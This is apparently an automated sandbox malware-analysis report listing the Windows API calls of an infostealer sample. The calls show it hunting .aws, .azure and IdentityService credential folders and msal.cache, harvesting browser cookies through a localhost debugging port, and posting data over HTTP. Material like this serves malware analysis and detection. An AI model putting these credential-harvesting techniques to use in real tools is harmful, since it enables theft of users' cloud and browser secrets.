                                            • lstrlen.KERNEL32(00425440), ref: 023F48F4
                                            • lstrlen.KERNEL32(004254E8), ref: 023F48FF
                                            • lstrlen.KERNEL32(00425590), ref: 023F4913
                                            • lstrlen.KERNEL32(00425638), ref: 023F491E
                                            • lstrlen.KERNEL32(004256E0), ref: 023F4929
                                            • lstrlen.KERNEL32(00425788), ref: 023F4934
                                            • lstrlen.KERNEL32(00425830), ref: 023F493F
                                            • lstrlen.KERNEL32(004258D8), ref: 023F4968
                                            • lstrlen.KERNEL32(00425980), ref: 023F4973
                                            • lstrlen.KERNEL32(00425A48), ref: 023F497E
                                            • lstrlen.KERNEL32(00425AF0), ref: 023F4989
                                            • lstrlen.KERNEL32(00425B98), ref: 023F4994
                                            • strlen.MSVCRT ref: 023F49A7
                                            • lstrlen.KERNEL32(00425C40), ref: 023F49CF
                                            • lstrlen.KERNEL32(00425CE8), ref: 023F49DA
                                            • lstrlen.KERNEL32(00425D90), ref: 023F49E5
                                            • lstrlen.KERNEL32(00425E38), ref: 023F49F0
                                            • lstrlen.KERNEL32(00425EE0), ref: 023F49FB
                                            • lstrlen.KERNEL32(00425F88), ref: 023F4A0B
                                            • lstrlen.KERNEL32(00426030), ref: 023F4A16
                                            • lstrlen.KERNEL32(004260D8), ref: 023F4A21
                                            • lstrlen.KERNEL32(00426180), ref: 023F4A2C
                                            • lstrlen.KERNEL32(00426228), ref: 023F4A37
                                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 023F4A53
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                            • String ID:
                                            • API String ID: 2127927946-0
                                            • Opcode ID: 17b32a439cbe3e0ae32343c02b1fa56e4c99a47b2d8951fd533b5c970d2f3f07
                                            • Instruction ID: 923791a64f49423737f1ffa0146671961194a423ba2a6a45058bbb748021226b
                                            • Opcode Fuzzy Hash: 17b32a439cbe3e0ae32343c02b1fa56e4c99a47b2d8951fd533b5c970d2f3f07
                                            • Instruction Fuzzy Hash: 74411B79740624ABD7109FE5FC4DADCBF70AB4C712BA08051FA0A89190C7F993859B7D
                                            APIs
                                            • GetProcAddress.KERNEL32(006D72B8,006D6C04), ref: 02409E58
                                            • GetProcAddress.KERNEL32(006D72B8,006D6FC8), ref: 02409E71
                                            • GetProcAddress.KERNEL32(006D72B8,006D7044), ref: 02409E89
                                            • GetProcAddress.KERNEL32(006D72B8,006D6C64), ref: 02409EA1
                                            • GetProcAddress.KERNEL32(006D72B8,006D6C50), ref: 02409EBA
                                            • GetProcAddress.KERNEL32(006D72B8,006D6CF8), ref: 02409ED2
                                            • GetProcAddress.KERNEL32(006D72B8,006D6ED4), ref: 02409EEA
                                            • GetProcAddress.KERNEL32(006D72B8,006D6D3C), ref: 02409F03
                                            • GetProcAddress.KERNEL32(006D72B8,006D6FA0), ref: 02409F1B
                                            • GetProcAddress.KERNEL32(006D72B8,006D6F48), ref: 02409F33
                                            • GetProcAddress.KERNEL32(006D72B8,006D6DBC), ref: 02409F4C
                                            • GetProcAddress.KERNEL32(006D72B8,006D6CE8), ref: 02409F64
                                            • GetProcAddress.KERNEL32(006D72B8,006D700C), ref: 02409F7C
                                            • GetProcAddress.KERNEL32(006D72B8,006D6AB0), ref: 02409F95
                                            • GetProcAddress.KERNEL32(006D72B8,006D6F98), ref: 02409FAD
                                            • GetProcAddress.KERNEL32(006D72B8,006D6C24), ref: 02409FC5
                                            • GetProcAddress.KERNEL32(006D72B8,006D6E18), ref: 02409FDE
                                            • GetProcAddress.KERNEL32(006D72B8,006D7034), ref: 02409FF6
                                            • GetProcAddress.KERNEL32(006D72B8,006D6ABC), ref: 0240A00E
                                            • GetProcAddress.KERNEL32(006D72B8,006D6B2C), ref: 0240A027
                                            • GetProcAddress.KERNEL32(006D72B8,006D6CB0), ref: 0240A03F
                                            • LoadLibraryA.KERNEL32(006D6F50,?,02406F07), ref: 0240A051
                                            • LoadLibraryA.KERNEL32(006D6B7C,?,02406F07), ref: 0240A062
                                            • LoadLibraryA.KERNEL32(006D6B04,?,02406F07), ref: 0240A074
                                            • LoadLibraryA.KERNEL32(006D6BDC,?,02406F07), ref: 0240A086
                                            • LoadLibraryA.KERNEL32(006D6D28,?,02406F07), ref: 0240A097
                                            • GetProcAddress.KERNEL32(006D70DC,006D6EAC), ref: 0240A0B9
                                            • GetProcAddress.KERNEL32(006D71FC,006D6E24), ref: 0240A0DA
                                            • GetProcAddress.KERNEL32(006D71FC,006D6BCC), ref: 0240A0F2
                                            • GetProcAddress.KERNEL32(006D72EC,006D6D94), ref: 0240A114
                                            • GetProcAddress.KERNEL32(006D71B0,006D6B28), ref: 0240A135
                                            • GetProcAddress.KERNEL32(006D71E0,006D6E14), ref: 0240A156
                                            • GetProcAddress.KERNEL32(006D71E0,0042072C), ref: 0240A16D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$LibraryLoad
                                            • String ID:
                                            • API String ID: 2238633743-0
                                            • Opcode ID: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
                                            • Instruction ID: bdbb32ffe0ed2911dcdaaf73fe8acaaa910b9f61b8d7eb0ba894d4ccaf9fcd00
                                            • Opcode Fuzzy Hash: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
                                            • Instruction Fuzzy Hash: DDA16EB5D0A2549FC344DFA8FC889567BBBA78D301708A61BF909C3674E734A640CF62
                                            APIs
                                              • Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF
                                              • Part of subcall function 024091D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02409202
                                              • Part of subcall function 0240AE97: lstrcpy.KERNEL32(00000000,?), ref: 0240AEE9
                                              • Part of subcall function 0240AE97: lstrcat.KERNEL32(00000000), ref: 0240AEF9
                                              • Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C
                                              • Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
                                              • Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
                                              • Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89
                                              • Part of subcall function 0240AD17: lstrcpy.KERNEL32(?,00000000), ref: 0240AD5D
                                              • Part of subcall function 023FA377: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 023FA3A3
                                              • Part of subcall function 023FA377: GetFileSizeEx.KERNEL32(000000FF,?), ref: 023FA3C8
                                              • Part of subcall function 023FA377: LocalAlloc.KERNEL32(00000040,?), ref: 023FA3E8
                                              • Part of subcall function 023FA377: ReadFile.KERNEL32(000000FF,?,00000000,023F16F6,00000000), ref: 023FA411
                                              • Part of subcall function 023FA377: LocalFree.KERNEL32(023F16F6), ref: 023FA447
                                              • Part of subcall function 023FA377: CloseHandle.KERNEL32(000000FF), ref: 023FA451
                                              • Part of subcall function 02409227: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02409249
                                            • strtok_s.MSVCRT ref: 024006E2
                                            • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBF,00420DBE,00420DBB,00420DBA), ref: 02400729
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02400730
                                            • StrStrA.SHLWAPI(00000000,00421710), ref: 0240074C
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 0240075A
                                              • Part of subcall function 02408CD7: malloc.MSVCRT ref: 02408CDF
                                              • Part of subcall function 02408CD7: strncpy.MSVCRT ref: 02408CFA
                                            • StrStrA.SHLWAPI(00000000,00421718), ref: 02400796
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 024007A4
                                            • StrStrA.SHLWAPI(00000000,00421720), ref: 024007E0
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 024007EE
                                            • StrStrA.SHLWAPI(00000000,00421728), ref: 0240082A
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 0240083C
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 024008C9
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 024008E1
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 024008F9
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 02400911
                                            • lstrcat.KERNEL32(?,00421744), ref: 02400929
                                            • lstrcat.KERNEL32(?,00421758), ref: 02400938
                                            • lstrcat.KERNEL32(?,00421768), ref: 02400947
                                            • lstrcat.KERNEL32(?,00000000), ref: 0240095A
                                            • lstrcat.KERNEL32(?,00421770), ref: 02400969
                                            • lstrcat.KERNEL32(?,00000000), ref: 0240097C
                                            • lstrcat.KERNEL32(?,00421774), ref: 0240098B
                                            • lstrcat.KERNEL32(?,00421778), ref: 0240099A
                                            • lstrcat.KERNEL32(?,00000000), ref: 024009AD
                                            • lstrcat.KERNEL32(?,00421780), ref: 024009BC
                                            • lstrcat.KERNEL32(?,00421784), ref: 024009CB
                                            • lstrcat.KERNEL32(?,00000000), ref: 024009DE
                                            • lstrcat.KERNEL32(?,00421790), ref: 024009ED
                                            • lstrcat.KERNEL32(?,00421794), ref: 024009FC
                                            • strtok_s.MSVCRT ref: 02400A40
                                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 02400A55
                                            • memset.MSVCRT ref: 02400AA4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                            • String ID:
                                            • API String ID: 3689735781-0
                                            • Opcode ID: 098dc5743905a2ee9813f64f0b56af725ff5a500f78c5c8fd9e9f659a4e17eb6
                                            • Instruction ID: d4124e34b7e7b85632e63de3a35f51b1f983f7a4ada4afe80eb27c4b0441a709
                                            • Opcode Fuzzy Hash: 098dc5743905a2ee9813f64f0b56af725ff5a500f78c5c8fd9e9f659a4e17eb6
                                            • Instruction Fuzzy Hash: 41D13171D01218ABCB04EBF1DD95EEE773AAF54701F50456EE206A60D0EF34AA88CF65
                                            APIs
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                              • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                              • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405A48
                                            • StrCmpCA.SHLWAPI(?,00A72600), ref: 00405A63
                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405BE3
                                            • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00A72610,00000000,?,00A693A0,00000000,?,00421B4C), ref: 00405EC1
                                            • lstrlenA.KERNEL32(00000000), ref: 00405ED2
                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00405EE3
                                            • HeapAlloc.KERNEL32(00000000), ref: 00405EEA
                                            • lstrlenA.KERNEL32(00000000), ref: 00405EFF
                                            • memcpy.MSVCRT(?,00000000,00000000), ref: 00405F16
                                            • lstrlenA.KERNEL32(00000000), ref: 00405F28
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405F41
                                            • memcpy.MSVCRT(?), ref: 00405F4E
                                            • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F6B
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F7F
                                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F9C
                                            • InternetCloseHandle.WININET(00000000), ref: 00406000
                                            • InternetCloseHandle.WININET(00000000), ref: 0040600D
                                            • HttpOpenRequestA.WININET(00000000,00A72650,?,00A72080,00000000,00000000,00400100,00000000), ref: 00405C48
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                            • InternetCloseHandle.WININET(00000000), ref: 00406017
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                            • String ID: "$"$------$------$------$S`A$S`A
                                            • API String ID: 1406981993-1449208648
                                            • Opcode ID: 98ea913884f64a500b12d84de6c339a9ec993a8037e53d87be3eb2d39ddf946f
                                            • Instruction ID: 528bda5bfb4e43d7cafc1c43cb8ffcda3f2e6465d8e228b0a039cdd5195e34d5
                                            • Opcode Fuzzy Hash: 98ea913884f64a500b12d84de6c339a9ec993a8037e53d87be3eb2d39ddf946f
                                            • Instruction Fuzzy Hash: 1412FC71925128ABCB14EBA1DCA5FEEB379BF14714F00419EF10662091EF783B98CB59
                                            APIs
                                            • memset.MSVCRT ref: 00414FD7
                                              • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                            • lstrcatA.KERNEL32(?,00000000), ref: 00415000
                                            • lstrcatA.KERNEL32(?,\.azure\), ref: 0041501D
                                              • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
                                              • Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                            • memset.MSVCRT ref: 00415063
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0041508C
                                            • lstrcatA.KERNEL32(?,\.aws\), ref: 004150A9
                                              • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
                                              • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
                                              • Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
                                              • Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2
                                            • memset.MSVCRT ref: 004150EF
                                            • lstrcatA.KERNEL32(?,00000000), ref: 00415118
                                            • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00415135
                                              • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C00
                                              • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,004208D3), ref: 00414C15
                                              • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C32
                                              • Part of subcall function 00414B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00414C6E
                                              • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00A6DEE0,?,000003E8), ref: 00414C9A
                                              • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE0), ref: 00414CAC
                                              • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CC0
                                              • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE4), ref: 00414CD2
                                              • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CE6
                                              • Part of subcall function 00414B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00414CFC
                                              • Part of subcall function 00414B60: DeleteFileA.KERNEL32(?), ref: 00414D81
                                            • memset.MSVCRT ref: 0041517B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                            • API String ID: 4017274736-974132213
                                            • Opcode ID: cd85f6f5a5e2b7ce53f17e9595acec7f298040401d7087830733eddf1b0d25f2
                                            • Instruction ID: 39229561bcf9e6d20be1630849a4938ad9d2aa6361ec20f439e2b4dca26d7b75
                                            • Opcode Fuzzy Hash: cd85f6f5a5e2b7ce53f17e9595acec7f298040401d7087830733eddf1b0d25f2
                                            • Instruction Fuzzy Hash: 3F41D6B5E4021867DB10F770EC4BFDD33385B60705F40485AB649660D2FEB8A7D88B9A
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,00A69400,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D083
                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D1C7
                                            • HeapAlloc.KERNEL32(00000000), ref: 0040D1CE
                                            • lstrcatA.KERNEL32(?,00000000,00A6DCB0,0042156C,00A6DCB0,00421568,00000000), ref: 0040D308
                                            • lstrcatA.KERNEL32(?,00421570), ref: 0040D317
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D32A
                                            • lstrcatA.KERNEL32(?,00421574), ref: 0040D339
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D34C
                                            • lstrcatA.KERNEL32(?,00421578), ref: 0040D35B
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D36E
                                            • lstrcatA.KERNEL32(?,0042157C), ref: 0040D37D
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D390
                                            • lstrcatA.KERNEL32(?,00421580), ref: 0040D39F
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D3B2
                                            • lstrcatA.KERNEL32(?,00421584), ref: 0040D3C1
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D3D4
                                            • lstrcatA.KERNEL32(?,00421588), ref: 0040D3E3
                                              • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,00A6DD90,?,004210F4,?,00000000), ref: 0041AB3B
                                              • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                            • lstrlenA.KERNEL32(?), ref: 0040D42A
                                            • lstrlenA.KERNEL32(?), ref: 0040D439
                                            • memset.MSVCRT ref: 0040D488
                                              • Part of subcall function 0041AD80: StrCmpCA.SHLWAPI(00000000,00421568,0040D2A2,00421568,00000000), ref: 0041AD9F
                                            • DeleteFileA.KERNEL32(00000000), ref: 0040D4B4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                            • String ID:
                                            • API String ID: 2775534915-0
                                            • Opcode ID: 354d224c4b0f3cfcf3718d24f287e44c077c4f9b3b18ea9b6768966a1a3a1af4
                                            • Instruction ID: 090733d9ad632ec07999f14fc915118f0ed2ae89bdc12e1fab3d18f5c5045e08
                                            • Opcode Fuzzy Hash: 354d224c4b0f3cfcf3718d24f287e44c077c4f9b3b18ea9b6768966a1a3a1af4
                                            • Instruction Fuzzy Hash: 35E17571E15114ABCB04EBA1ED56EEE7339AF14305F10415EF106760A1EF38BB98CB6A
                                            APIs
                                              • Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF
                                              • Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
                                              • Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
                                              • Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89
                                              • Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C
                                              • Part of subcall function 02408F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,023F1660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 02408F7D
                                              • Part of subcall function 0240AE97: lstrcpy.KERNEL32(00000000,?), ref: 0240AEE9
                                              • Part of subcall function 0240AE97: lstrcat.KERNEL32(00000000), ref: 0240AEF9
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 023FD2EA
                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 023FD42E
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 023FD435
                                            • lstrcat.KERNEL32(?,00000000), ref: 023FD56F
                                            • lstrcat.KERNEL32(?,00421570), ref: 023FD57E
                                            • lstrcat.KERNEL32(?,00000000), ref: 023FD591
                                            • lstrcat.KERNEL32(?,00421574), ref: 023FD5A0
                                            • lstrcat.KERNEL32(?,00000000), ref: 023FD5B3
                                            • lstrcat.KERNEL32(?,00421578), ref: 023FD5C2
                                            • lstrcat.KERNEL32(?,00000000), ref: 023FD5D5
                                            • lstrcat.KERNEL32(?,0042157C), ref: 023FD5E4
                                            • lstrcat.KERNEL32(?,00000000), ref: 023FD5F7
                                            • lstrcat.KERNEL32(?,00421580), ref: 023FD606
                                            • lstrcat.KERNEL32(?,00000000), ref: 023FD619
                                            • lstrcat.KERNEL32(?,00421584), ref: 023FD628
                                            • lstrcat.KERNEL32(?,00000000), ref: 023FD63B
                                            • lstrcat.KERNEL32(?,00421588), ref: 023FD64A
                                              • Part of subcall function 0240AD97: lstrlen.KERNEL32(023F51BC,?,?,023F51BC,00420DDF), ref: 0240ADA2
                                              • Part of subcall function 0240AD97: lstrcpy.KERNEL32(00420DDF,00000000), ref: 0240ADFC
                                            • lstrlen.KERNEL32(?), ref: 023FD691
                                            • lstrlen.KERNEL32(?), ref: 023FD6A0
                                            • memset.MSVCRT ref: 023FD6EF
                                              • Part of subcall function 0240AFE7: StrCmpCA.SHLWAPI(00000000,00421568,023FD509,00421568,00000000), ref: 0240B006
                                            • DeleteFileA.KERNEL32(00000000), ref: 023FD71B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                            • String ID:
                                            • API String ID: 1973479514-0
                                            • Opcode ID: 61858acd6518aa59b0545b41e6e8699b4742c055ec598c9622ee146424d88619
                                            • Instruction ID: 68ab899c8c951d08f22875c4f83963e5a65a02c0585b7a9131138c12c4566ae5
                                            • Opcode Fuzzy Hash: 61858acd6518aa59b0545b41e6e8699b4742c055ec598c9622ee146424d88619
                                            • Instruction Fuzzy Hash: 7DE11271D10218ABCB04EBA1DD95DEE733AAF54301F50456EF606A60E0EF35AE88CF61
                                            APIs
                                              • Part of subcall function 00409A50: InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 00409A6A
                                            • memset.MSVCRT ref: 00409C33
                                            • lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 00409C48
                                            • lstrcatA.KERNEL32(?,00000000), ref: 00409C5E
                                            • memset.MSVCRT ref: 00409C9A
                                            • lstrcatA.KERNEL32(?,cookies), ref: 00409CAF
                                            • lstrcatA.KERNEL32(?,004212C4), ref: 00409CC1
                                            • lstrcatA.KERNEL32(?,?), ref: 00409CD5
                                            • lstrcatA.KERNEL32(?,004212C8), ref: 00409CE7
                                            • lstrcatA.KERNEL32(?,?), ref: 00409CFB
                                            • lstrcatA.KERNEL32(?,.txt), ref: 00409D0D
                                            • lstrlenA.KERNEL32(00000000), ref: 00409D17
                                            • lstrlenA.KERNEL32(00000000), ref: 00409D26
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • memset.MSVCRT ref: 00409D7E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$memset$lstrlen$InternetOpenlstrcpy
